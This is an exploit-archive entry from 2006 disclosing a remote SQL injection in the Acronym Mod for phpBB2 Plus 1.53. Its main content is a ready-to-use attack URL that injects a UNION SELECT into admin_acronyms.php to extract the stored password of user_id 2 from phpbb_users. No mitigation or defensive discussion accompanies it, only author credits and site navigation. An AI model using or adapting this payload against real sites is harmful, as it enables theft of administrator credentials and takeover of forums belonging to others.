phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability
# Published : 2006-12-28
# Author : the master
# Previous Title : WYWO - InOut Board 1.0 Multiple Remote Vulnerabilities
# Next Title : ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability

########################################################################
#  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability
#
#  Download: http://www.codemonkeyx.net
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
#
#  Greetz: str0ke , Dr Max Virus , Kacper
########################################################################

# www.Syue.com [2006-12-28]